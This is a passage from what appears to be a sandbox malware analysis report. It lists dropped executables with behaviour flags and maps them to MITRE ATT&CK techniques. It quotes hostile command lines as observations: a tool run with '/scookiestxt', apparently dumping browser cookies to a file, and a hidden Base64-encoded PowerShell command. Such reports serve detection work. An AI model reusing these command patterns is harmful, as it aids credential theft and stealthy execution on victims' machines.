- Suspicious use of AdjustPrivilegeToken
PID:2680

C:\Users\Admin\Pictures\Adobe Films\3NW733gLGF333CMfQpzX0HZg.exe
"C:\Users\Admin\Pictures\Adobe Films\3NW733gLGF333CMfQpzX0HZg.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2204

C:\Users\Admin\AppData\Local\Temp\ce22f1e7-e68d-4a15-bd06-190aea332387.exe
"C:\Users\Admin\AppData\Local\Temp\ce22f1e7-e68d-4a15-bd06-190aea332387.exe"
4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2544

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1572

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1808

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:1844

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:1536

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220314012030.log C:\Windows\Logs\CBS\CbsPersist_20220314012030.cab
1⤵
- Drops file in Windows directory
PID:776

C:\Windows\SysWOW64\ohikezke\gqdlvptu.exe
C:\Windows\SysWOW64\ohikezke\gqdlvptu.exe /d"C:\Users\Admin\Pictures\Adobe Films\EP0WuBrtGWGK5fmYQHX7kBoA.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1044

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:2580

C:\Windows\system32\taskeng.exe
taskeng.exe {3EE7EBC7-8872-4E5B-9718-912E495C783B} S-1-5-21-2199625441-3471261906-229485034-1000:DRLQIXCW\Admin:Interactive:[1]
1⤵
PID:2888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2772

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:684

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2340

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery